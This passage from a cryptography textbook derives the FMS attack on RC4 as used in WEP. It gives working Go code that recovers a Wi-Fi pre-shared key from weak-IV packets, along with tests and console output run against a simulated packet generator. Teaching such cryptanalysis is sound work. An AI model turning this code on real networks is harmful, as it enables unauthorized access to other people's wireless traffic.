Figure 4.13 KSA S-box and key for RC4 in WEP (S0 , the initial state)

i0 = 0
(4.9)
j0 = 0

For your convenience we are listing the pseudocode for KSA again in listing 4.15. Fol-
lowing the pseudocode the first update to i and j is shown in equation 4.10. At the end of
each iteration of the KSA S [ jnew ] is swapped with S [iold ]. For example, at the end of the
first iteration S [i0 ] is swapped with S [ j1 ], giving us S1 depicted in figure 4.14. The values
at indices 0 & 3 (the shaded boxes) have just been swapped.

Listing 4.15 Pseudocode for RC4 key-scheduling algorithm

for i from 0 to 255


S[i] := i
endfor
j := 0
for i from 0 to 255
j := (j + S[i] + key[i mod keylength]) mod 256
swap values of S[i] and S[j]
endfor
i0 = 1
j1 = j0 + S0 [i0 ] + K [i0 ]
= 0 + S0 [0] + K [0]
(4.10)
=0+0+3
=3
i1 = 1

Figure 4.14 KSA for RC4 in WEP (S1 )

Let’s execute one more iteration of KSA, giving us equation 4.11 and figure 4.15.

i2 = 2
j2 = j1 + S1 [i1 ] + K [i1 ]
= 3 + S1 [1] + K [1]
(4.11)
= 3 + 1 + 255
= 259
≡ 3 (mod 256)

The first two bytes of the IV (3 and 255) have played their role in scrambling the S-box.
We chose a random value for the third box and called it X. The reason we did not actually
give X a value is because it does not really matter (for the discussion of this attack). Let’s
keep it as X and get new values of our counters in equation 4.12.
Figure 4.15 KSA for RC4 in WEP (S2 )

i3 = 3
j3 = j2 + S2 [i2 ] + K [i2 ]
= 3 + S2 [2] + K [2] (4.12)
=3+2+X
= X′

The reason we don’t care about X and X ′ is because X is already known as the third
byte of the IV (i.e., as K [2]) for each packet. We do not need to crack X, it will always
be sent in public by the Wi-Fi devices. We are interested in the first byte of the PSK, i.e.,
PSK1 or K [3] that we will obtain by the end of this procedure. For now, let’s swap the
values at indices 2 (i.e., i2 ) and X ′ (i.e., j3 ) in our S-box, as shown in figure 4.16.

i4 = 4
j4 = j3 + S3 [i3 ] + K [i3 ] (4.13)
= j3 + S3 [3] + K [3]

Let’s take a look at the next update of our counters in equation 4.13, giving us S4 as
shown in figure 4.17. We are getting closer to what we want, i.e., K [3]. We can try rear-
ranging our variables to get the holy grail (K [3]) in equation 4.14.

K [3] = j4 − j3 − S3 [i3 ]
(4.14)
= j4 − X ′ − S3 [3]

RECOVERING THE FIRST BYTE OF THE PSK


Figure 4.16 KSA for RC4 in WEP (S3 )

Figure 4.17 KSA for RC4 in WEP (S4 )

Now we face a challenge in continuing our KSA execution with the next byte of the key:
as attackers we have now exhausted the three public bytes from the IV, ending up with the
same S4 as the genuine recipient so far (shown in figure 4.17). We also know X ′ because
that depended on X, the public third byte of the IV. However, we still do not know j4 . In
other words, since the IV is public, as attackers we can only do the first three iterations of
KSA (for certain weak IVs) but continuing beyond that would require knowledge of the
PSK.

Listing 4.16 Pseudocode for RC4 pseudo-random generation algorithm

i := 0
j := 0
while GeneratingOutput:
i := (i + 1) mod 256
j := (j + S[i]) mod 256
swap values of S[i] and S[j]
KS := S[(S[i] + S[j]) mod 256]
output KS
endwhile

Now imagine that values at the three locations pointed to by arrows in figure 4.17 (in-
dices 0, 1 and 3) do not change for the rest of the KSA. That is, when we get to the
PRGA (shown again in listing 4.16 for convenience), we have (S0 [0], S0 [1], S0 [3]) =
(3, 0, j4(ksa) ) (i.e., they have remained unchanged from S4 of KSA all the way up to S255
which becomes S0 for PRGA). This is not as far-fetched as it sounds really; the i pointer
traverses the S-box all the way from left to right while the j pointer keeps hopping all over
the place. Since i has already traversed indices 0, 1, and 3 by S4 , our assumption relies on j
not landing over one of these crucial indices again for the rest of the KSA. If this condition
holds true, the initial S-box for PRGA is shown in figure 4.18. The first update for our
counters is shown in equation 4.15.

Figure 4.18 PRGA S-box for RC4 in WEP (S0 )

i0 = 0; j0 = 0
i1 = 1; j1 = j0 + S0 [1]
(4.15)
=0+0
=0

After the swap we get S1 as shown in figure 4.19. The first byte of the keystream (output
of the PRGA) is given by equation 4.16. If our grand assumption holds that the important
bytes did not change positions between S4 and S255 of KSA (and hence S0 of PRGA),
the first byte of the keystream will be j4(KSA) , exactly what we needed to solve for K [3]
in equation 4.14. Equation 4.17 shows the final calculation we will do to resolve K [3].
Remember, we could run KSA only up to j3 and could not find out j4 . However, because
of our assumption of crucial bytes not shifting for the rest of KSA we found out j4 as the
first output of the PRGA.
Figure 4.19 PRGA S-box for RC4 in WEP (S1 )

KS0 = S1 [S1 [i1 ] + S1 [ j1 ]]


= S1 [S1 [1] + S1 [0]]
(4.16)
= S1 [3]
= j4(KSA)

How often would our assumption (that the crucial positions were not touched between
S4(KSA) → S255(KSA) → S0(PRGA) ) hold? If RC4 in WEP was not vulnerable to the FMS
1
attack the answer would have been 256 , i.e., any of the bytes of S4(KSA) should have an
equal probability of about 0.4% of being the first output of PRGA. As it turns out, RC4
has statistical biases, where our assumption holds for about 3-5% of the time (much greater
than 0.4%). The practical implication of this bias is that since we know the first 8 bytes of
plaintext, we can always find out KS[0]; and j4(KSA) will simply be the most frequent value
that appears as KS[0]. To recap, without these biases KS[0] would give us no information
about the original key, but because of them KS[0] tends to be j4(KSA) with more frequency
than chance. This allows attacker to recover K[3] by using equation 4.17. The attack works
for any index other than 3 as well (granted we have recovered the key bytes before that
index) as shown by equation 4.18.

K [3] = j4(KSA) − j3(KSA) − S3(KSA) [3]


(4.17)
= KS [0] − j3(KSA) − S3(KSA) [3]

K [L] = KS [0] − jL(KSA) − SL(KSA) [L] (4.18)

We can now implement our attack in Go and use the WEP Packet Generator from
listing ?? (that encrypts first 8 bytes of WEP packets – the fixed SNAP header – with a user-
provided PSK and a weak IV) to test our attack. Listing 4.17 shows the FMS algorithm
recovering the PSK for RC4 in WEP, the attack sequence is described below:
RecoverWEPPSK(wpg, partialKey) is called with a WEP Packet Generator initial-
ized with a specific PSK. Please note that RecoverWEPPSK cannot see the PSK, it can
only ask for more packets to be generated using weak IVs. This is simulating an at-
tacker sniffing Wi-Fi packets and encountering weak IVs. The amount of traffic we
simulate is capped by the WEPMessageVolume constant, set to 50k for our current test.
partialKey denotes partially recovered PSK; so for the first invocation of the method
it will be an empty slice, for the second it will contain one byte and so on.
The first thing we do inside the function body is to identify the index we want to target
with our FMS attack. Since the first three bytes of the RC4 key are known (as the IV),
the targetIndex value would be equal to the length of the PSK we have recovered
so far plus three. At the beginning, we do not know any bytes of the PSK so the
targetIndex is 3. This is shown in line 18. The targetIndex variable corresponds
to L in equation 4.18.
Lines 23 - 24 depict a known-plaintext attack where the knowledge of the first byte of
the plaintext is able to give us the first byte of the keystream. For the FMS attack, the
first keystream byte is actually all we need (we don’t need the next 7 keystream bytes
even though they can be found out by XORing ciphertext with the SNAP header).
Lines 26 - 28 copy the IV and partial PSK respectively to create the RC4 key.
Lines 30 - 38 depict partial execution of KSA up to iteration L.
Lines 40 - 45 show us finding a candidate for K [L] in equation 4.18. We will get
multiple values for K [L], but the correct value will appear 3-5% of the time (instead
of only 0.4% of the time – which would have prevented us from selecting one value
as the “winner”).
The remaining lines of the function simply select the byte value that appeared the
most as K [L]. We pretty print some stats end then function by returning the candi-
date byte that appeared with the highest frequency.

Listing 4.17 ch04/rc4/exploit_rc4/exploit_rc4.go

1 package exploit_rc4
2
3 import (
4 ”fmt”
5
6 ”github.com/krkhan/crypto-impl-exploit/ch04/rc4/impl_rc4”
7 )
8
9 const WEPMessageVolume = 50000
10
11 func swap(x, y *byte) {
12 tmp := *x
13 *x = *y
14 *y = tmp
15 }
16
17 func RecoverWEPPSK(wpg *impl_rc4.WEPPacketGenerator, partialKey []byte) byte
{
18 targetIndex := 3 + len(partialKey) RC4 key = 3 bytes of IV + PSK
19 totalCount := 0
20 freqDict := [256]int{}
21
22 for i := 0; i < WEPMessageVolume; i++ { Recover the first byte
23 iv, ciphertext := wpg.GeneratePacketUsingWeakIV(targetIndex) of keystream using
24 keystreamByte := impl_rc4.SNAPHeader[0] ^ ciphertext[0] known plaintext
25
26 key := make([]byte, len(iv)+len(partialKey)) Concatenate IV and PSK to
27 copy(key[0:len(iv)], iv[:]) create the RC4 key
28 copy(key[len(iv):], partialKey)
29
30 state := [256]byte{}
31 for i := 0; i < 256; i++ {
32 state[i] = byte(i)
33 } Partial execution of KSA
34 j := 0 for targetIndex iterations
35 for i := 0; i < targetIndex; i++ {
36 j = (j + int(state[i]) + int(key[i])) % 256
37 swap(&state[i], &state[j])
38 }
39
40 candidateKey := (int(keystreamByte) - j - int(state[targetIndex])) % 256
41 if candidateKey < 0 {
42 candidateKey += 256
43 } Calculate K[L] from equation 4.18
44 freqDict[candidateKey] += 1 and track the count for each
45 totalCount += 1 candidate
46 }
47
48 var highestFreqCandidate byte
49 var highestFreqPercentage float64
50 for i := 0; i < 256; i++ {
51 freqPercentage := float64(freqDict[i]) / float64(totalCount) * 100
52 if freqPercentage > highestFreqPercentage {
53 highestFreqCandidate = byte(i)
54 highestFreqPercentage = freqPercentage
55 }
56 }
57
58 fmt.Printf(”recovered byte: 0x%02x, frequency: %.2f%%\n”,
highestFreqCandidate, highestFreqPercentage)
59 return highestFreqCandidate
60 }

We test our exploit by creating a WEPPacketGenerator initialized with a specific PSK.


We then call RecoverWEPPSK(wpg, partialKey) as many times as needed with wpg pointed
to the packet generator and partialKey denoting the key we have recovered so far. This
is shown in listing 4.18 where we test our exploit twice using the pre-shared keys “hel-
loworld123” and “1supersecret1”.

Listing 4.18 ch04/rc4/exploit_rc4/exploit_rc4_test.go


1 package exploit_rc4
2
3 import (
4 ”testing”
5
6 ”github.com/krkhan/crypto-impl-exploit/ch04/rc4/impl_rc4”
7 )
8
9 func TestRecoverWEPPSK(t *testing.T) {
10 t.Logf(”message volume: %d”, WEPMessageVolume)
11
12 originalKey := []byte(”helloworld123”)
13 wpg := impl_rc4.NewWEPPacketGenerator(originalKey)
14 recoveredKey := []byte{}
15
16 for i := 0; i < len(originalKey); i++ {
17 recoveredKeyByte := RecoverWEPPSK(wpg, recoveredKey)
18 recoveredKey = append(recoveredKey, recoveredKeyByte)
19 }
20 t.Logf(”recovered key: %q”, recoveredKey)
21
22 for i := 0; i < len(originalKey); i++ {
23 if recoveredKey[i] != originalKey[i] {
24 t.Fatalf(”key mismatch, recovered: %v, original: %v\n”, recoveredKey,
originalKey)
25 }
26 }
27
28 originalKey = []byte(”1supersecret1”)
29 wpg = impl_rc4.NewWEPPacketGenerator(originalKey)
30 recoveredKey = []byte{}
31
32 for i := 0; i < len(originalKey); i++ {
33 recoveredKeyByte := RecoverWEPPSK(wpg, recoveredKey)
34 recoveredKey = append(recoveredKey, recoveredKeyByte)
35 }
36 t.Logf(”recovered key: %q”, recoveredKey)
37
38 for i := 0; i < len(originalKey); i++ {
39 if recoveredKey[i] != originalKey[i] {
40 t.Fatalf(”key mismatch, recovered: %v, original: %v\n”, recoveredKey,
originalKey)
41 }
42 }
43 }

The output for our test is shown in listing 4.19. As you can see, the correct K [L] values
(that appeared as the most frequent candidate) also fall roughly in the 3-5% range. Con-
gratulations, not only have we implemented FMS attack to successfully recover a WEP
PSK!

Listing 4.19 Console output for testing TestRecoverWEPPSK

$ make exploit_rc4

go clean -testcache
go test -v ./ch04/rc4/exploit_rc4
=== RUN TestRecoverWEPPSK
exploit_rc4_test.go:10: message volume: 50000
recovered byte: 0x68, frequency: 4.32%
recovered byte: 0x65, frequency: 5.28%
recovered byte: 0x6c, frequency: 4.75%
recovered byte: 0x6c, frequency: 2.76%
recovered byte: 0x6f, frequency: 3.40%
recovered byte: 0x77, frequency: 4.37%
recovered byte: 0x6f, frequency: 4.69%
recovered byte: 0x72, frequency: 5.86%
recovered byte: 0x6c, frequency: 3.25%
recovered byte: 0x64, frequency: 3.49%
recovered byte: 0x31, frequency: 5.31%
recovered byte: 0x32, frequency: 5.56%
recovered byte: 0x33, frequency: 4.61%
exploit_rc4_test.go:18: recovered key: ”helloworld123”
recovered byte: 0x31, frequency: 5.31%
recovered byte: 0x73, frequency: 5.85%
recovered byte: 0x75, frequency: 4.66%
recovered byte: 0x70, frequency: 5.36%
recovered byte: 0x65, frequency: 4.31%
recovered byte: 0x72, frequency: 6.94%
recovered byte: 0x73, frequency: 5.47%
recovered byte: 0x65, frequency: 4.84%
recovered byte: 0x63, frequency: 5.97%
recovered byte: 0x72, frequency: 4.84%
recovered byte: 0x65, frequency: 6.28%
recovered byte: 0x74, frequency: 3.84%
recovered byte: 0x31, frequency: 5.10%
exploit_rc4_test.go:34: recovered key: ”1supersecret1”
--- PASS: TestRecoverWEPPSK (4.03s)
PASS
ok github.com/krkhan/crypto-impl-exploit/ch04/rc4/exploit_rc4 4.031
s

We have also just implemented our first probabilistic/statistical attack – where the re-
sults are not guaranteed – which are encountered quite often in cryptography. The reader
is encouraged to change WEPMessageVolume in 4.17 to different values to see how that
impacts our results. With 50k messages (using weak IVs) we were able to recover the two
PSKs we tested. If we set the message volume to 500 we get incorrect results as shown in
4.20. The low volume corresponds to low-traffic Wi-Fi connections: it was easier to break
WEP in public places like cafés where there was high volume of traffic (and hence more
messages with weak IVs) than residential areas where it would take longer for weak IVs to
appear. In other words, the more Wi-Fi traffic an attacker was able to capture with weak
IVs the more confidence they could gain in the results of their FMS attack.

Listing 4.20 Low message volume leads to incorrect results for the FMS attack

$ make exploit_rc4
go clean -testcache
go test -v ./ch04/rc4/exploit_rc4
=== RUN TestRecoverWEPPSK
exploit_rc4_test.go:10: message volume: 500
recovered byte: 0x68, frequency: 3.80%
recovered byte: 0x65, frequency: 5.40%
recovered byte: 0x6c, frequency: 3.40%
recovered byte: 0x6c, frequency: 3.60%
recovered byte: 0x94, frequency: 2.00%
recovered byte: 0x2c, frequency: 2.60%
recovered byte: 0x95, frequency: 3.80%
recovered byte: 0x72, frequency: 4.40%
recovered byte: 0x6c, frequency: 3.20%
recovered byte: 0x64, frequency: 2.40%
recovered byte: 0x31, frequency: 6.40%
recovered byte: 0x32, frequency: 4.00%
recovered byte: 0x33, frequency: 5.80%
exploit_rc4_test.go:20: recovered key: ”hell\x94,\x95rld123”
exploit_rc4_test.go:24: key mismatch, recovered: [104 101 108 108 148 44
149 114 108 100 49 50 51], original: [104 101 108 108 111 119 111 114
108 100 49 50 51]
--- FAIL: TestRecoverWEPPSK (0.04s)
FAIL
FAIL github.com/krkhan/crypto-impl-exploit/ch04/rc4/exploit_rc4 0.038
s
FAIL
make: *** [Makefile:54: exploit_rc4] Error 1

4.4 Summary
XOR is a Boolean operation that takes two inputs and outputs true if and only if one
of them is true. In other words, XOR is true one of its inputs is exclusively true.
XOR serves as the building block of many encryption algorithms because:

– When using the same key, encryption and decryption are reverse operations of
each other and hence ciphertext can be reversed back to plaintext using the original
key.

– For a bit encrypted with XOR, without knowledge of the key, all plaintexts (both
true and false) have equal probability of being the original message.

XOR encryption runs the risk of known-plaintext attacks where an attacker can XOR
the corresponding ciphertext with a known-plaintext to recover the key.
An attacker can also XOR two ciphertexts to reveal XOR of their corresponding plain-
texts.
If we had a unique random key as long as the message for each message we wanted
to encrypt we could simply XOR them together to get ciphertext, and it would be
the perfect unbreakable encryption system. This construction is called the “one-time
pad” but is not widely used because securely communicating a key of the same length
as the message begs the question in a way, where now we have to solve the practical
concerns of how to transport the key.
Therefore, instead of using XOR directly, we seed an RNG with a short “key” or
seed and then use the output of the RNG as our “keystream” which we XOR with
the plaintext.
Linear-feedback shift registers (LFSRs) can be used as stream ciphers but on their
own their internal working details can easily be reversed by exploiting the linear na-
ture of their output (e.g., by using linear algebra).
RC4 is a widely used stream cipher that was used by the first Wi-Fi security stan-
dard (WEP) insecurely that allows an attacker to recover the Wi-Fi password just
by snooping on encrypted communications between genuine participants and then
using the statistical biases in RC4 to recover the original pre-shared key.

References
[1] Rc4. https://en.wikipedia.org/wiki/RC4. 16, 17
[2] Sub-network access protocol (snap). https://www.firewall.cx/
networking-topics/ethernet/ethernet-frame-formats/202-
ieee-8023-snap-frame.html. 20

You might also like